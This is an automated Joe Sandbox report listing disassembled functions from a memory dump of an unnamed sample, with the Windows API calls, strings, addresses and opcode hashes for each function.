Opcode ID: 7e7249222bb1172e912c757c0e08614bcf600e618b3d1d2402cd7cafc0dbaf43
Instruction ID: 4835a39f3f387efae3eeea774b6f476b07ee7cfa9d30b49bb0145b894077bbd4
Opcode Fuzzy Hash: 7e7249222bb1172e912c757c0e08614bcf600e618b3d1d2402cd7cafc0dbaf43
Instruction Fuzzy Hash: D14188B5600305AFCB05DF55CC88BAA7BADEF44750F1480A9AA09DF205D7B1D94ACBB0

Function 00D85A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D85A93
GetMenuItemInfoW.USER32 ref: 00D85AAF
DeleteMenu.USER32(00000004,00000007,00000000), ref: 00D85AF5
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E018F0,00000000), ref: 00D85B3E

Strings

0, xrefs: 00D85A8B

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: b2ddcdaf206b3b950ce4dd0b6ee16f5cba121cfecb36a348016947b379215119
Instruction ID: 84b2c7ed284155b4c88b81fe53b4712338b0036ca2ea6e2b46096c4e8a5e3187
Opcode Fuzzy Hash: b2ddcdaf206b3b950ce4dd0b6ee16f5cba121cfecb36a348016947b379215119
Instruction Fuzzy Hash: C941A1312047029FD714AF24E880F5AB7E8EF95714F18462DF8A5972D5D770E800CB72

Function 00DA0458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 00DA0478

Part of subcall function 00D47F40: _memmove.LIBCMT ref: 00D47F8F

Part of subcall function 00D4A2FB: _memmove.LIBCMT ref: 00D4A33D

Strings

stdcall, xrefs: 00DA04FA
none, xrefs: 00DA0553
winapi, xrefs: 00DA04E9
cdecl, xrefs: 00DA04CF

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _memmove$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2411302734-567219261
Opcode ID: 2f25f150960a8622be715ccb033626347ff6a7bafe054adc58d451eb2c223e0b
Instruction ID: 95c4c43654a6c9b331fc843674d647fb8b1b6a6fc6d3533952fb76f1163a7499
Opcode Fuzzy Hash: 2f25f150960a8622be715ccb033626347ff6a7bafe054adc58d451eb2c223e0b
Instruction Fuzzy Hash: 29318174900619ABCF04EF58C8919FEB7B5FF15310B148A29E8629B2D5DB71E909CBB0

Function 00D7C600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00D7C684
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00D7C697
SendMessageW.USER32(?,00000189,?,00000000), ref: 00D7C6C7

Part of subcall function 00D47E53: _memmove.LIBCMT ref: 00D47EB9

Strings

ListBox, xrefs: 00D7C643
ComboBox, xrefs: 00D7C60B

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend$_memmove
String ID: ComboBox$ListBox
API String ID: 458670788-1403004172
Opcode ID: ab62e2814cdd0131b1c5f62ab26920eac9760c71754f0691f14295ccc63db465
Instruction ID: 8fba354eaa77102a55516dacbf2b0ecaa90a0d81220fa3639cfede1623026267
Opcode Fuzzy Hash: ab62e2814cdd0131b1c5f62ab26920eac9760c71754f0691f14295ccc63db465
Instruction Fuzzy Hash: 1F21F671940108BFDB049BA4CC86DFF7769DF05354B149129F426E31E1EB784D0A9670

Function 00D94A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00D94A60
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D94A86
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00D94AB6
InternetCloseHandle.WININET(00000000), ref: 00D94AFD

Part of subcall function 00D956A9: GetLastError.KERNEL32(?,?,00D94A2B,00000000,00000000,00000001), ref: 00D956BE

Strings

, xrefs: 00D94AAF

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: 53716943d0ed09d35b5335c423fa3d2c335133fe0f51e8e2c660169693d16539
Instruction ID: 5ef26a2c04e4161d2a6d8b3923a69c4a8246919d730e2431cfbe4197960a0418
Opcode Fuzzy Hash: 53716943d0ed09d35b5335c423fa3d2c335133fe0f51e8e2c660169693d16539
Instruction Fuzzy Hash: 3021CFB5640209BFEF12DF64DC84EBBB6EDEB49748F10412AF106E2241EA70CD068775

Function 00D438E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00DB454E

Part of subcall function 00D47E53: _memmove.LIBCMT ref: 00D47EB9

_memset.LIBCMT ref: 00D43965
_wcscpy.LIBCMT ref: 00D439B5
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D439C6

Strings

Line: , xrefs: 00DB4578

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: dde0fa5c879b4c57ff8efc9a9857b81b5f7ea83589504b83578b85bcd6381832
Instruction ID: c1990aeed8cfa4aa5f618baacad3d7fb3ab58d69236ae115717b306948c64fb4
Opcode Fuzzy Hash: dde0fa5c879b4c57ff8efc9a9857b81b5f7ea83589504b83578b85bcd6381832
Instruction Fuzzy Hash: E731AF71008341AFD721EB64CC42FDA77E8EB58750F04451AF1C9921A1DB71AB8CCBB2

Function 00DA8EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00D5C657
Part of subcall function 00D5C619: GetStockObject.GDI32(00000011), ref: 00D5C66B
Part of subcall function 00D5C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D5C675

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00DA8F69
LoadLibraryW.KERNEL32(?), ref: 00DA8F70
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00DA8F85
DestroyWindow.USER32(?), ref: 00DA8F8D

Strings

SysAnimate32, xrefs: 00DA8F44

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 74f6bb813935180c31a4e0ef622cc54ef14ff2b1d50311405b8e0372c66f8c53
Instruction ID: a54fef8494ab700bd8c3106f56358b3c9c1744e94a8683bf839b62bfb8540a69
Opcode Fuzzy Hash: 74f6bb813935180c31a4e0ef622cc54ef14ff2b1d50311405b8e0372c66f8c53
Instruction Fuzzy Hash: D121887120020AAFEF104E64DC80EBB7BAAEF4A324F144628FE5497190DB71DC90A770

Function 00D8E382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00D8E392
GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 00D8E3E6
__swprintf.LIBCMT ref: 00D8E3FF
SetErrorMode.KERNEL32(00000000,00000001,00000000,00DDDBF0), ref: 00D8E43D

Strings

%lu, xrefs: 00D8E3F9

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 1d75d16d21e5bb891efbfcc5700fbdc98eba6402d9dcbf126b151440c7ce3851
Instruction ID: c18468df1c0dac1d83007c341c1725aaf0aa066c1feb7f9a8c5d99ee63bfd1d3
Opcode Fuzzy Hash: 1d75d16d21e5bb891efbfcc5700fbdc98eba6402d9dcbf126b151440c7ce3851
Instruction Fuzzy Hash: 7D214F35A40209AFCB10EF64CC85DAEB7B9EF49714B144069F509D7291D731DA05CB70

Function 00D7D7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D47E53: _memmove.LIBCMT ref: 00D47EB9

Part of subcall function 00D7D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00D7D640
Part of subcall function 00D7D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D7D653
Part of subcall function 00D7D623: GetCurrentThreadId.KERNEL32 ref: 00D7D65A
Part of subcall function 00D7D623: AttachThreadInput.USER32(00000000), ref: 00D7D661

GetFocus.USER32 ref: 00D7D7FB

Part of subcall function 00D7D66C: GetParent.USER32(?), ref: 00D7D67A

GetClassNameW.USER32(?,?,00000100), ref: 00D7D844
EnumChildWindows.USER32(?,00D7D8BA), ref: 00D7D86C
__swprintf.LIBCMT ref: 00D7D886

Strings

%s%d, xrefs: 00D7D880

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 2f53d6b3310a9a37016b16e72ac7ed771785d734b09bf541e3bf00d08fffc361
Instruction ID: a663e9f70a042a4b53711e0839dd5fc2ff6e28da879ec6ab5eacb5d70bf52b88
Opcode Fuzzy Hash: 2f53d6b3310a9a37016b16e72ac7ed771785d734b09bf541e3bf00d08fffc361
Instruction Fuzzy Hash: 2C11727154020A6BDB11BFA0DC85FEE377AEF44704F0480B9BE0DAA186EB745945DB71

Function 00DA1836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00DA18E4
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00DA1917
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00DA1A3A
CloseHandle.KERNEL32(?), ref: 00DA1AB0

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 07635a10980a9b92b3fec23945cc6f4dc21747660c061d12c4ac4baaee413d65
Instruction ID: eed4605c5e03e8cad8d219aaef9e17b8779dbd9e25b97739bfb9abb02882111b
Opcode Fuzzy Hash: 07635a10980a9b92b3fec23945cc6f4dc21747660c061d12c4ac4baaee413d65
Instruction Fuzzy Hash: 52817F74A40215ABDF109F64C886BADBBE5EF45720F188059FD05AF382DBB4E9458BB0

Function 00DA0579 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00D484A6: __swprintf.LIBCMT ref: 00D484E5
Part of subcall function 00D484A6: __itow.LIBCMT ref: 00D48519

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00DA05DF
GetProcAddress.KERNEL32(00000000,?), ref: 00DA066E
GetProcAddress.KERNEL32(00000000,00000000), ref: 00DA068C
GetProcAddress.KERNEL32(00000000,?), ref: 00DA06D2
FreeLibrary.KERNEL32(00000000,00000004), ref: 00DA06EC

Part of subcall function 00D5F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00D8AEA5,?,?,00000000,00000008), ref: 00D5F282
Part of subcall function 00D5F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00D8AEA5,?,?,00000000,00000008), ref: 00D5F2A6

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 63cf0a0f00f1e9b8da9d620845e1e204ed456c285667b209f1bbda3412b5523c
Instruction ID: 33338dd942d293fa2e885776fe517b7010f6c0cb7f53fea88716ad968093613e
Opcode Fuzzy Hash: 63cf0a0f00f1e9b8da9d620845e1e204ed456c285667b209f1bbda3412b5523c
Instruction Fuzzy Hash: 7E514B75A00206DFCB00EFA8C894DADBBB5FF49310B188065EA55AB352DB34ED45CBB1

Function 00DA2D1A Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F

Part of subcall function 00DA3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DA2AA6,?,?), ref: 00DA3B0E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DA2DE0
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DA2E1F
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00DA2E66
RegCloseKey.ADVAPI32(?,?), ref: 00DA2E92
RegCloseKey.ADVAPI32(00000000), ref: 00DA2E9F

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: b8710d7c39732cc5f4c6a3eaa5053ba321983e7fdc1dd0802a7ec1f95b09d487
Instruction ID: 2d3cc48707efb333c9e7d676820b87f3d4b61778d8f3e3cf54880fe7e6db7bf4
Opcode Fuzzy Hash: b8710d7c39732cc5f4c6a3eaa5053ba321983e7fdc1dd0802a7ec1f95b09d487
Instruction Fuzzy Hash: B1515A71218205AFD704EF68CC81E6AB7E9FF88714F04481EF596872A1DB31E905DB72

Function 00DACB07 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 649e79cd7c619e9c3137b4de178184cfee9bc033ef0708cb66f1e811efa5d075
Instruction ID: ac076d17924f5233ca1bf10281a4e43e1a65f24e58c98ca789bb5f972dbd1d8c
Opcode Fuzzy Hash: 649e79cd7c619e9c3137b4de178184cfee9bc033ef0708cb66f1e811efa5d075
Instruction Fuzzy Hash: D0411335910205AFDB24DF28CC49FA9BBA9EB0A330F185261F959E72D0C7319D40D670

Function 00D91726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00D917D4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00D917FD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00D9183C

Part of subcall function 00D484A6: __swprintf.LIBCMT ref: 00D484E5
Part of subcall function 00D484A6: __itow.LIBCMT ref: 00D48519

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00D91861
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00D91869

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 5d988be865bf09212a821794d20c22ca721083adafbdc375609981bc5178fbe9
Instruction ID: fd5948f41619a96b151572a096c4e0a11656bde36d4a87cd827162ab9c0b07c6
Opcode Fuzzy Hash: 5d988be865bf09212a821794d20c22ca721083adafbdc375609981bc5178fbe9
Instruction Fuzzy Hash: E341F935A00206EFDB11EF64C981AADBBF5EF48350B148099E80AAB361DB31ED45DB71

Function 00D5B736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 00D5B749
ScreenToClient.USER32(00000000,000000FF), ref: 00D5B766
GetAsyncKeyState.USER32(00000001), ref: 00D5B78B
GetAsyncKeyState.USER32(00000002), ref: 00D5B799

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
